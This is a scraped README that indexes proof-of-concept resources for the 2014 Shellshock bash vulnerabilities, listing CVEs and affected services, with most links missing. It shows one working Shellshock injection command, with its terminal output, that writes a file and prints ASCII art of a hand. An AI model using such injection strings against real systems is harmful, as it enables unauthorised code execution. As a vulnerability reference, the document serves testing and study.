Home

Awesome

Shellshocker - Repository of "Shellshock" Proof of Concept Code

Collection of Proof of Concepts and Potential Targets for #ShellShocker

Wikipedia Link: https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details

Please submit a pull request if you have more links or other resources

Speculation:(Non-confirmed possibly vulnerable)

If you know of PoCs for any of these, please submit an issue or pull request with a link.

Command Line (Linux, OSX, and Windows via Cygwin)

CVE-2014-6271

CVE-2014-7169

will create a file named echo in cwd with date in it, if vulnerable

CVE-2014-7186

CVE-2014-7187

CVE-2014-6278

CVE-2014-6277

will segfault if vulnerable

IBM z/OS -

HTTP

Phusion Passenger

DHCP

SSH

OSX

OSX - with reverse DNS (CVE-2014-3671.txt)

SIP

Qmail

Postfix

FTP

OpenVPN

Oracle

TMNT

Hand

user@localhost:~$ env X='() { (a)=>\' /bin/bash -c "shellshocker echo -e \"           __ __\n          /  V  \ \n     _    |  |   |\n    / \   |  |   |\n    |  |  |  |   |\n    |  |  |  |   |\n    |  |__|  |   |\n    |  |  \  |___|___\n    |  \   |/        \ \n    |   |  |______    |\n    |   |  |          |\n    |   \__'   /     |\n    \        \(     /\n     \             /\n      \|            |\n\""; cat shellshocker
/bin/bash: X: line 1: syntax error near unexpected token `='
/bin/bash: X: line 1: `'
/bin/bash: error importing function definition for `X'
           __ __
          /  V  \ 
     _    |  |   |
    / \   |  |   |
    |  |  |  |   |
    |  |  |  |   |
    |  |__|  |   |
    |  |  \  |___|___
    |  \   |/        \ 
    |   |  |______    |
    |   |  |          |
    |   \__'   /     |
    \        \(     /
     \             /
      \|            |

CUPS

IRC

Scripts from @primalsec